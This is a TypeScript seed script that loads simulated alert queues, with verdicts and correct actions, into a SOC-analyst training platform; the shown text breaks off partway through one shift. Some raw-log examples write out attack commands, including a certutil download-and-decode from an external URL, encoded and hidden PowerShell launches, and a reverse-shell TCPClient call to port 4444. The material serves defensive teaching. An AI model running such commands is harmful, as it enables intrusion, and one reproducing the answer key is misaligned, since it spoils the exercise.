// Fills in real alert content for the 11 SOC Shifts that were published as
// empty shells (0 alerts) — 9 real attempts had already been made against
// them, so people were opening a shift and getting nothing to triage.
// Idempotent — safe to run multiple times. Run: npx tsx scripts/seed-soc-shift-content.ts

import { PrismaClient } from "@prisma/client";

const db = new PrismaClient();

type Alert = {
  order: number;
  source: string;
  summary: string;
  rawLog: string;
  verdict: "TRUE_POSITIVE" | "FALSE_POSITIVE";
  correctAction: "ESCALATE" | "CLOSE" | "MONITOR";
  explanation: string;
};

type Shift = {
  slug: string;
  title: string;
  briefing?: string; // only set when improving a placeholder briefing
  alerts: Alert[];
};

const SHIFTS: Shift[] = [
  // ── Generic day shells ──────────────────────────────────────────────────
  {
    slug: "soc-shift-week-1",
    title: "SOC Shift - Monday",
    briefing:
      "Monday night, 45 minutes, thirteen alerts. Nothing here is themed — it's a normal queue. " +
      "Triage each on its own evidence and don't let a quiet start make you complacent by alert nine.",
    alerts: [
      { order: 1, source: "EDR", summary: "Browser toolbar adware quarantined automatically on a marketing laptop.", rawLog: "Detection: PUA:Win32/ToolbarBundler  Host: MKT-LT-14  Action: Quarantined, no further activity.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Commodity adware, auto-remediated, no follow-on activity. Routine." },
      { order: 2, source: "Identity", summary: "Service account authenticated via NTLM from an unfamiliar subnet at 02:14, no change ticket on file.", rawLog: "svc_reporting NTLM auth from 10.44.8.201 (unrecognised subnet), 02:14:07. No CR in change log for tonight.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Service accounts authenticate from known infrastructure only. New subnet, off-hours, no ticket — escalate." },
      { order: 3, source: "Network", summary: "Accounting workstation issuing DNS lookups for a rotating sequence of freshly-registered, gibberish-looking domains.", rawLog: "ACC-WKS-09: 40 NXDOMAIN/DNS queries in 3 min for domains registered <48h ago, pattern consistent with a DGA.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Domain-generation-algorithm-style lookups are a strong malware C2 fallback indicator. Escalate." },
      { order: 4, source: "Email", summary: "User-reported phishing email — sender domain has valid SPF/DKIM and matches a confirmed partner.", rawLog: "Reported msg from billing@partnerco-invoicing.com — SPF pass, DKIM pass, domain matches Partner Master List entry #22.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Passes authentication and matches a verified partner record. User caution was reasonable, but this checks out." },
      { order: 5, source: "Firewall", summary: "Single blocked outbound connection attempt to a known Tor exit node from a developer workstation.", rawLog: "DEV-WKS-31 -> 185.220.101.7:9001 BLOCKED (Tor exit node, threat feed match). One attempt, no retry.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Blocked, single attempt — not confirmed compromise, but Tor traffic from a dev box is worth a quiet follow-up, not an immediate close." },
      { order: 6, source: "Cloud", summary: "New access key generated for a production service account outside the standard change window.", rawLog: "IAM: new AccessKey created for svc-prod-reporting by user j.abara at 01:52, no matching CR-tagged event.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Credential material created for a production account with no change record, off-hours. Escalate and verify with the account owner." },
      { order: 7, source: "EDR", summary: "Word document spawned certutil.exe with a base64-decode argument pointing at an external URL.", rawLog: "WINWORD.EXE -> certutil.exe -urlcache -split -f hxxp://185.199.108.[.]x/upd.b64 -decode, host FIN-WKS-04.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "certutil abused as a LOLBin downloader from a macro-capable Office process is a textbook initial-access chain. Escalate." },
      { order: 8, source: "DLP", summary: "200MB copied to USB by an employee on their final scheduled day before parental leave.", rawLog: "USB mass storage event, user r.calloway, 210MB, files match their own project folder. HR record confirms leave starts tomorrow.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Explained by a corroborated HR record and consistent with the employee's own work — not exfiltration." },
      { order: 9, source: "Identity", summary: "Three failed MFA push prompts in two minutes, followed by one approval, all from the user's usual device.", rawLog: "MFA push denied x3 (18s apart), then approved, device fingerprint matches enrolled device for user t.okonkwo.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Rapid repeated push prompts followed by an approval is the classic push-bombing/MFA-fatigue pattern, even from an enrolled device — the device could be the attacker's if the token was phished. Escalate to confirm with the user directly." },
      { order: 10, source: "Network", summary: "Internal host sequentially probing SMB (445) across three different subnets.", rawLog: "IT-WKS-77 -> 10.10.1.0/24, 10.10.2.0/24, 10.10.3.0/24 port 445, sequential sweep, ~1 host/sec.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Sequential internal SMB sweeping is reconnaissance behaviour ahead of lateral movement. Escalate." },
      { order: 11, source: "EDR", summary: "Signed vendor updater launched under a scheduled task parent process, matching its documented update cycle.", rawLog: "VendorUpdater.exe (Authenticode valid) spawned by Task Scheduler, matches CR-4402 monthly update window.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Signed binary, expected parent, matches a documented change record. Routine." },
      { order: 12, source: "Web Proxy", summary: "User browsed a personal webmail provider during their lunch break.", rawLog: "u.demir -> outlook.live.com, 12:31–12:44, no attachments uploaded, acceptable-use policy allows personal browsing at lunch.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Within policy, no data movement. Not a security event." },
      { order: 13, source: "File Server", summary: "Employee recently placed on a performance plan accessed 40 files across the HR share outside their normal role.", rawLog: "u.patel (Sales) accessed \\\\FS-HR\\Confidential 40 times in 20 min, no downloads to external media detected yet.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "No confirmed exfiltration yet, but access well outside role plus recent HR context is worth watching, not an immediate close." },
    ],
  },
  {
    slug: "soc-shift-week-2",
    title: "SOC Shift - Tuesday",
    briefing:
      "Tuesday night, 45 minutes, twelve alerts. Business as usual on the surface — a couple of these are built " +
      "to look routine right up until the last detail.",
    alerts: [
      { order: 1, source: "Web Proxy", summary: "Access to a URL-shortener link that resolves to the company's own internal wiki.", rawLog: "u.frost -> bit.ly/3xK9 -> resolves to wiki.internal.corp/onboarding, shared in #general Slack this morning.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Shortener resolves to an internal, benign destination shared through a known channel." },
      { order: 2, source: "Identity", summary: "Password reset requested for the Finance Director's account, followed minutes later by a login from an unrecognised ASN.", rawLog: "Self-service reset for a.whitfield at 09:02, login success at 09:11 from ASN 20473 (offshore hosting provider), no VPN.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Privileged account, reset immediately followed by login from a hosting-provider IP, no VPN — classic account-takeover pattern. Escalate." },
      { order: 3, source: "EDR", summary: "LSASS memory access flagged by behavioural monitoring; process was Task Manager under an active IT support ticket.", rawLog: "taskmgr.exe -> OpenProcess(lsass.exe), user is IT support, ticket #5521 open for a credential-caching investigation.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Legitimate diagnostic access under an open, matching support ticket." },
      { order: 4, source: "Network", summary: "Heavy SMB traffic between two file servers during a scheduled replication job.", rawLog: "FS-01 <-> FS-02, 60GB transferred, window matches documented nightly DFS-R replication schedule.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Expected volume, expected hosts, expected schedule." },
      { order: 5, source: "Email", summary: "Invoice-themed email with a macro-enabled attachment from a domain one character off from a real vendor's.", rawLog: "Sender: billing@vendorco-supply.com (real vendor is vendorco-supplγ.com — Greek gamma substituted for 'y'). Attachment: invoice_0847.docm.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Homoglyph typosquat plus a macro-enabled attachment is a targeted phishing lure. Escalate." },
      { order: 6, source: "Cloud", summary: "Storage bucket containing customer export files had its access policy changed to public-read.", rawLog: "S3 PutBucketAcl on customer-exports-prod: public-read granted, actor: ci-deploy-bot, no matching pipeline run logged.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Customer data bucket made public with no legitimate deploy behind it — data exposure in progress. Escalate immediately." },
      { order: 7, source: "EDR", summary: "PowerShell launched with -EncodedCommand from a Word document's child process.", rawLog: "WINWORD.EXE -> powershell.exe -EncodedCommand JABzAD0A..., host SALES-WKS-19.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Encoded PowerShell spawned from Office is a standard macro-malware execution stage. Escalate." },
      { order: 8, source: "VPN", summary: "Consultant account connected outside contracted hours; procurement record shows the engagement was extended.", rawLog: "c.reyes (contractor) VPN login 22:40, contract system shows SOW extension #3 approved yesterday, new hours 08:00–23:00.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Explained by an approved, verifiable contract change." },
      { order: 9, source: "DLP", summary: "Outbound email with a spreadsheet blocked for containing card-number-pattern data; sender confirms it was a test file.", rawLog: "Blocked: b.hoang -> external, attachment matched PAN regex, sender states via ticket it was synthetic test data for QA.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "DLP did its job blocking it; sender explanation and QA context check out, no real card data involved." },
      { order: 10, source: "Identity", summary: "A legacy service account, flagged for disablement in last quarter's access review, authenticated successfully.", rawLog: "svc_legacy_reports login success, account listed in Q2 access review as 'to be disabled', review action never completed.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "An account that should already be disabled successfully authenticating is a control failure at minimum, and a possible compromise vector — escalate to confirm who's using it." },
      { order: 11, source: "Firewall", summary: "Spike in outbound NTP traffic from a single host, matching a monitoring tool's post-upgrade behaviour.", rawLog: "MON-SRV-02 NTP queries up 8x baseline, coincides with monitoring platform v4.2 upgrade completed yesterday per change log.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Plausibly explained by the upgrade, but worth one more shift's observation to confirm it settles back to baseline before fully closing." },
      { order: 12, source: "Web Proxy", summary: "Workstation browsed to a paste site; page content unknown and the user is currently unreachable.", rawLog: "PROD-WKS-08 -> pastebin-mirror[.]net/raw/8k2m, content not captured by proxy, user out of office, no callback yet.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "No corroborating context either way — flag for follow-up when the user is reachable rather than guessing at a verdict." },
    ],
  },
  {
    slug: "soc-shift-week-3",
    title: "SOC Shift - Wednesday",
    briefing:
      "Wednesday night, 45 minutes, twelve alerts. A stale threat-intel feed is in play tonight — don't let a " +
      "confident-looking match substitute for actually checking the destination.",
    alerts: [
      { order: 1, source: "EDR", summary: "Adobe Reader spawned PowerShell moments after opening an emailed PDF invoice.", rawLog: "AcroRd32.exe -> powershell.exe -nop -w hidden, host OPS-WKS-12, triggered by opening invoice_sept.pdf from email.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "PDF readers don't legitimately spawn hidden PowerShell — this is an exploit or embedded-script execution chain. Escalate." },
      { order: 2, source: "Network", summary: "Vulnerability scanner traffic originating from the security team's own scanning subnet.", rawLog: "10.99.0.0/28 (Sec-Scan) -> broad internal sweep, matches scheduled Wednesday authenticated scan window.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Own scanning infrastructure, scheduled window. Expected." },
      { order: 3, source: "Identity", summary: "Account locked after failed logins from the user's own IP while travelling; user self-reported to helpdesk.", rawLog: "5x 4625 from 88.212.4.x (user-confirmed hotel wifi), account locked, helpdesk ticket #6602 open matching timeline.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Self-reported, corroborated by a support ticket and consistent travel context." },
      { order: 4, source: "Email", summary: "DMARC failure on an email impersonating internal IT support, requesting a password reset via an external link.", rawLog: "From: 'IT Support' <support@corp-mail-secure.net>, DMARC=fail, link points to a credential-harvesting page mimicking the SSO portal.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Failed DMARC, spoofed internal identity, credential-phishing link. Escalate and pull the campaign." },
      { order: 5, source: "Cloud", summary: "Conditional access policy disabled by an admin account outside the change window, no ticket filed.", rawLog: "Azure AD: CA policy 'Require MFA for admins' disabled by g.oduya at 03:11, no CR, no prior notification.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "A security control disabled off-hours with no paper trail is either a compromised admin account or a serious process breach — either way, escalate." },
      { order: 6, source: "EDR", summary: "Antivirus definition update process briefly flagged by behavioural heuristics, cleared itself within seconds.", rawLog: "AvDefenderUpdate.exe transient heuristic flag, self-resolved, signed binary, matches scheduled 02:00 definitions pull.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Self-resolving heuristic noise from a signed, scheduled process." },
      { order: 7, source: "Network", summary: "Beaconing-pattern traffic to an IP that threat intel flagged as malicious — the feed entry is nine months stale.", rawLog: "Dest 172.67.x.x flagged 'C2' by feed dated Dec 2025; current WHOIS/passive DNS shows the IP is now a Cloudflare CDN edge.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "The threat-intel match is stale — the IP has since been reassigned to legitimate CDN infrastructure. Verify destinations independently, not just against a feed hit." },
      { order: 8, source: "DLP", summary: "Engineer copied the main source-code repository to a personal cloud drive; resignation was submitted yesterday.", rawLog: "d.marsh (Engineering) synced /repo/core (1.4GB) to personal Dropbox, resignation letter logged in HR system yesterday 16:40.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Bulk IP exfiltration correlated with a resignation is a well-known departing-employee risk pattern. Escalate." },
      { order: 9, source: "Web Proxy", summary: "Employee browsed a competitor's public website, no downloads.", rawLog: "u.saito -> competitorcorp.com, 3 pages viewed, no forms submitted, no files transferred.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Public site, no data movement, ordinary market research." },
      { order: 10, source: "Identity", summary: "New MFA device registered on an executive's account; the executive confirms it themself via a callback.", rawLog: "New Authenticator enrolment for CFO account, verified via phone callback to known number, matches a recent phone upgrade.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Verified directly with the account owner through an out-of-band channel." },
      { order: 11, source: "File Server", summary: "Ransomware canary file triggered on the Operations department share.", rawLog: "Canary file \\\\FS-OPS\\zzz_donotdelete.docx modified/renamed at 23:41 by session mapped from OPS-WKS-03.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Canary files exist for exactly this — a trigger means active encryption or mass-rename behaviour is underway. Escalate immediately." },
      { order: 12, source: "VPN", summary: "Split-tunnel policy violation flagged for a user connected from a coffee shop.", rawLog: "Split-tunnel traffic detected for u.ilyas from a public wifi AP, matches their established remote-work pattern (3x/week).", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Consistent with established behaviour, but public-wifi split-tunnel use is still worth a policy reminder rather than a full close." },
    ],
  },
  {
    slug: "soc-shift-week-4",
    title: "SOC Shift - Thursday",
    briefing:
      "Thursday night, 45 minutes, twelve alerts. Two of tonight's alerts are further steps of the same compromise — " +
      "the queue won't tell you that, you have to notice it yourself.",
    alerts: [
      { order: 1, source: "EDR", summary: "Known ad-injecting browser extension flagged as a potentially unwanted program on a contractor's laptop.", rawLog: "PUP:BrowserExt/AdInject flagged on CTR-LT-06, contractor-owned BYOD device, browser extension only.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Low-severity PUP on a non-corporate-managed device. Routine." },
      { order: 2, source: "Network", summary: "Outbound traffic to an IP geolocated in a sanctioned country, traced to a shared CDN address hosting a legitimate SaaS product.", rawLog: "Dest IP geo-flagged, reverse lookup + TLS SNI confirms traffic is to app.legitsaastool.com, shared hosting.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Geolocation on shared CDN infrastructure is unreliable — the actual destination, confirmed via SNI, is a known legitimate SaaS tool." },
      { order: 3, source: "Identity", summary: "Impossible-travel alert: successful logins from two countries twenty minutes apart.", rawLog: "l.brennan: login from UK 14:02, login from Southeast Asia 14:23, no VPN/proxy indicator on either.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "No feasible travel explains this gap — credential compromise. Escalate." },
      { order: 4, source: "Email", summary: "Spearphishing email to the CFO referencing a real, recent internal project by name.", rawLog: "Subject references 'Project Halcyon' (internal codename, not public), asks for an urgent wire approval, sender spoofed as CEO.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Use of a non-public internal project name indicates reconnaissance or a compromised internal mailbox behind this — high-confidence BEC attempt. Escalate." },
      { order: 5, source: "Cloud", summary: "New admin-level API key generated in the production account with no corresponding change ticket.", rawLog: "IAM key created, scope: AdministratorAccess, account: prod-core, actor: root, no CR, no MFA challenge logged for the action.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Root-level credential creation with no MFA challenge and no ticket is a critical-severity indicator. Escalate immediately." },
      { order: 6, source: "EDR", summary: "Script-block logging captured an obfuscated PowerShell one-liner that decodes to a reverse-shell payload.", rawLog: "Decoded: New-Object System.Net.Sockets.TCPClient('185.199.x.x',4444) ... on host l.brennan's workstation.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "This is the same host from alert #3 — the impossible-travel login was used to drop a reverse shell. Escalate as a continuation of the same incident, not a fresh one." },
      { order: 7, source: "Network", summary: "Backup replication traffic misclassified as anomalous by a newly deployed IDS signature.", rawLog: "Nightly DFS-R job flagged by signature ET-88231 (new, deployed this week), traffic matches documented replication schedule exactly.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "New signature is over-triggering on known-good scheduled traffic. Tune the rule, close the alert." },
      { order: 8, source: "DLP", summary: "80 pages of a customer contract printed by an employee on the contracts team.", rawLog: "u.ferro (Legal/Contracts) printed Contract_ClientX_Final.pdf, matches their standard job function.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Consistent with the employee's normal role and duties." },
      { order: 9, source: "Web Proxy", summary: "Browsing to a well-known technology news site, flagged by an overly broad content category rule.", rawLog: "Blocked by category 'Technology/News' (miscategorised), destination is a mainstream tech publication.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Category rule misconfiguration, not a security concern." },
      { order: 10, source: "Identity", summary: "Shared finance service account password changed by someone outside the two authorised administrators.", rawLog: "svc_finance_batch password reset by j.aldana — access list shows only m.chu and r.ng are authorised for this account.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Unauthorised change to a shared privileged credential. Escalate to determine whether this is a compromised admin account or a process violation." },
      { order: 11, source: "File Server", summary: "Access to the finance share at 03:00 by an employee based in a different timezone.", rawLog: "u.iwata accessed \\\\FS-FIN at 03:00 UTC, HR record confirms based in Tokyo — local time is 12:00 noon.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Timestamp only looks anomalous in UTC — fully explained once converted to the employee's actual local business hours." },
      { order: 12, source: "Firewall", summary: "Port scan detected originating from an internal subnet, later traced to a newly deployed asset-inventory tool.", rawLog: "10.30.4.12 scanning internal ranges on common ports, host identified as new AssetDiscovery appliance, deployed Tuesday per infra log.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Plausibly explained by a new legitimate tool, but confirm with the infra team and get it added to the allowlist before fully closing out future occurrences." },
    ],
  },
  {
    slug: "soc-shift-week-5",
    title: "SOC Shift - Friday",
    briefing:
      "Friday night, 45 minutes, twelve alerts. One of tonight's items is a departing employee whose access should " +
      "have already been cut — the queue won't flag that for you either.",
    alerts: [
      { order: 1, source: "EDR", summary: "Trojan downloader quarantined on a guest-wifi device that isn't corporate-managed.", rawLog: "Detection on device MAC not in asset inventory, connected via Guest-WiFi SSID, BYOD, quarantined by endpoint AV automatically.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Outside corporate management scope and already contained by the device's own AV — note for the guest-network team, not a SOC incident." },
      { order: 2, source: "Network", summary: "Large transfer to a personal cloud storage domain from an employee on their last working day, no offboarding ticket filed yet.", rawLog: "u.grady (last day per HR calendar) -> 2.1GB to personal-drive-sync[.]com, offboarding ticket not yet created.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Bulk transfer to personal storage on a departing employee's last day, ahead of formal offboarding. Escalate and involve HR/Legal." },
      { order: 3, source: "Identity", summary: "Login using a former employee's credentials; HR record shows termination two weeks ago.", rawLog: "Login success for account 'p.osei', HR system shows termination date 14 days prior, account was never disabled.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "An account that should have been disabled two weeks ago is actively being used — escalate as a likely compromise and an offboarding process failure." },
      { order: 4, source: "Email", summary: "A vendor notified that one of their mailboxes was compromised and used to send phishing; one of our employees received it and clicked.", rawLog: "Vendor security advisory received; internal search confirms u.baptiste received and clicked the link at 15:40 today.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Confirmed click on a known-malicious link from a compromised trusted-vendor mailbox. Escalate for the affected user's endpoint and credentials." },
      { order: 5, source: "EDR", summary: "Real-time protection briefly disabled then re-enabled fleet-wide, matching the AV vendor's own update process.", rawLog: "RTP toggled off/on across managed fleet, 22:00–22:03, matches vendor-published maintenance window for tonight's release.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Documented vendor maintenance, fleet-wide and time-boxed. Expected." },
      { order: 6, source: "Cloud", summary: "Lifecycle policy on a compliance-retention bucket changed to delete objects after one day.", rawLog: "S3 lifecycle rule on audit-logs-retained changed: expiration 1d (was 2555d/7yr), actor: unclear (assumed-role session).", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "A change that would destroy 7 years of compliance-mandated retention down to 1 day, via an ambiguous assumed-role identity, is either sabotage or anti-forensic activity. Escalate immediately." },
      { order: 7, source: "Network", summary: "Internal host communicating with infrastructure a fresh threat-intel feed attributes to a ransomware affiliate.", rawLog: "FIN-SRV-02 -> 91.240.x.x:443, matches IOC published this morning for an active ransomware affiliate's C2.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Fresh, high-confidence IOC match to known ransomware infrastructure. Escalate as a top priority." },
      { order: 8, source: "DLP", summary: "Automated end-of-week report export to the analytics team's shared drive, matching the recurring schedule.", rawLog: "svc_reporting exported weekly_metrics.xlsx to \\\\FS-Analytics, matches every-Friday 17:00 schedule.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine, scheduled, expected destination." },
      { order: 9, source: "Web Proxy", summary: "Access to a torrent tracker site from an IT workstation, matching a documented filtering-rule test.", rawLog: "it-test-wks -> torrent-tracker-demo[.]net, matches change ticket CR-4510 'validate category blocking for Q3 policy'.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Documented, authorised test activity." },
      { order: 10, source: "Identity", summary: "A contractor's account access was extended by someone other than their assigned sponsor; the sponsor is unreachable to confirm.", rawLog: "Contractor c.duval access extended 90 days by m.okafor (not listed as sponsor — sponsor is r.hale, on leave, unreachable).", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Not enough to call malicious, but an unauthorised-looking access change with the actual approver unreachable needs verification before the weekend, not a full close." },
      { order: 11, source: "File Server", summary: "An intern account bulk-downloaded the entire engineering wiki export.", rawLog: "intern_j.wu downloaded eng-wiki-full-export.zip (1.8GB), account created 3 days ago, no prior large-download history.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Mass export by a brand-new, low-privilege account is disproportionate to any normal intern task. Escalate to confirm intent with their manager." },
      { order: 12, source: "VPN", summary: "Connection attempt using a client certificate that was revoked earlier this week.", rawLog: "VPN-GW-01 rejected cert serial 0x4F2A (revoked Tuesday, decommissioned laptop), source IP is residential, not the office.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "The gateway correctly rejected it, so there's no access — but someone still has a decommissioned device's certificate and is actively trying to use it. Worth a quiet follow-up." },
    ],
  },

  // ── Themed shifts ────────────────────────────────────────────────────────
  {
    slug: "soc-shift-monday-days",
    title: "Monday — Day Shift",
    alerts: [
      { order: 1, source: "EDR", summary: "Saturday: adware quarantined automatically on a workstation.", rawLog: "Detection: PUA:Win32/AdBundler  Host: SALES-WKS-22  Sat 11:14  Action: Quarantined automatically.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine, auto-remediated over the weekend. Safe to close now." },
      { order: 2, source: "Identity", summary: "Saturday 02:00: 40 failed logins against a rarely-used admin portal, then nothing.", rawLog: "40x 4625 against legacy-admin.internal over 6 min, Sat 02:00–02:06, no success, no further attempts since.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "A failed brute-force attempt with no success — not an active incident, but log it against the target for pattern-tracking this week." },
      { order: 3, source: "Network", summary: "Beaconing traffic to an external IP has been running continuously since Saturday night, undetected until now.", rawLog: "FIN-WKS-31 -> 45.76.x.x:8080 every 90s, first seen Sat 23:10, still active — 33 hours of unbroken beaconing.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "This is the one that sat all weekend. Sustained regular beaconing over 33 hours is an active, ongoing compromise — escalate now, don't let it run another day." },
      { order: 4, source: "Email", summary: "A delayed vendor newsletter flagged by an outdated blocklist entry.", rawLog: "Newsletter from confirmed-vendor.com, blocklist hit references an IP the vendor stopped using 4 months ago.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Stale blocklist entry against a known-legitimate sender." },
      { order: 5, source: "Cloud", summary: "Saturday: unusual auto-scaling resource spin-up, matching a scheduled weekend batch job.", rawLog: "ASG scaled 4->22 instances, Sat 01:00, matches documented weekly batch-analytics job window.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Expected, scheduled, documented." },
      { order: 6, source: "EDR", summary: "The same host from the beaconing alert now shows a newly created scheduled task.", rawLog: "FIN-WKS-31: new scheduled task 'WinSysUpdateCheck' created Sun 04:00, runs a hidden PowerShell script every reboot.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Same host as the beaconing alert — this is a persistence mechanism being planted while it sat unnoticed over the weekend. Escalate as the same incident." },
      { order: 7, source: "DLP", summary: "Saturday: automated compliance export ran on schedule.", rawLog: "svc_compliance exported audit_pack.zip to the compliance archive, matches weekly Saturday 03:00 schedule.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine and scheduled." },
      { order: 8, source: "Web Proxy", summary: "Sunday: access to a known phishing-kit hosting IP, from a security researcher's sandboxed VM per their documented testing.", rawLog: "sandbox-vm-03 -> known-phishkit-host, matches security team's own weekly kit-analysis testing log entry.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Own team's documented, sandboxed research activity." },
      { order: 9, source: "Identity", summary: "Sunday: a shared support-inbox login from a new IP matching the on-call rotation's home location.", rawLog: "support-shared login from a new residential IP, geolocation matches on-call engineer's registered home address.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Explained by the on-call schedule and a consistent, verifiable location." },
      { order: 10, source: "File Server", summary: "The same compromised host began accessing files outside its normal department share.", rawLog: "FIN-WKS-31 accessed \\\\FS-Legal\\Contracts (0 prior access in 6 months of history), Sun 09:00, 14 files opened.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Third alert tied to the same host: after beaconing and planting persistence, it's now exploring outside its normal scope. Escalate as continued evidence of the same active compromise." },
      { order: 11, source: "Firewall", summary: "Saturday: brief retransmission spike from ISP-side maintenance, flagged by a newly deployed anomaly rule.", rawLog: "Retransmit rate +6x baseline for 4 min Sat 05:00, ISP status page confirms scheduled maintenance in that window.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Corroborated by the ISP's own published maintenance window." },
      { order: 12, source: "Network", summary: "Monday 08:00: a second host on the same subnet as the compromised one begins the same beaconing pattern.", rawLog: "FIN-WKS-33 (same /24 as FIN-WKS-31) begins identical 90s-interval beacon to 45.76.x.x:8080, first seen 08:04.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "It's spreading. A second host picking up the identical beacon confirms lateral movement from the original compromise — escalate as an active, expanding incident, not an isolated new alert." },
    ],
  },
  {
    slug: "soc-shift-tuesday-nights",
    title: "Tuesday — Night Shift",
    alerts: [
      { order: 1, source: "EDR", summary: "Antivirus popup on an HR laptop, auto-resolved.", rawLog: "Detection auto-quarantined on HR-LT-03, no further activity, resolved within 90 seconds.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Handled automatically, no escalation needed — not worth waking anyone." },
      { order: 2, source: "Network", summary: "Unusual but explained overnight batch traffic between two application servers.", rawLog: "APP-01 <-> APP-02 large transfer, matches documented nightly ETL job CR-3390.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Documented, expected." },
      { order: 3, source: "Identity", summary: "Single failed login from a factory-floor terminal; badge logs confirm the employee was on-site.", rawLog: "1x 4625 from FLOOR-TERM-08, badge system confirms u.eze badged in 4 minutes prior.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Corroborated by physical access logs — a mistyped password, nothing more." },
      { order: 4, source: "EDR", summary: "Behavioural detection flags rapid mass file encryption in progress on a finance workstation.", rawLog: "FIN-WKS-11: 900+ files rewritten with new extension in 40 seconds, canary file among them, process: unsigned svchost32.exe.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Active ransomware encryption in progress. This is exactly the kind of thing worth waking someone up for — escalate immediately, don't wait for morning." },
      { order: 5, source: "Web Proxy", summary: "Browsing to shopping sites at 01:00 from an unattended warehouse kiosk terminal.", rawLog: "WH-KIOSK-02 -> retail sites, 01:00–01:20, terminal has no assigned user, low network privilege.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Odd and worth a daytime follow-up on physical access to that kiosk, but low-privilege and no data risk — doesn't justify an overnight escalation." },
      { order: 6, source: "Network", summary: "Routine nightly vulnerability scan from the SOC's own subnet.", rawLog: "10.99.0.0/28 scanning internal ranges, matches scheduled Tuesday authenticated scan.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Own infrastructure, scheduled." },
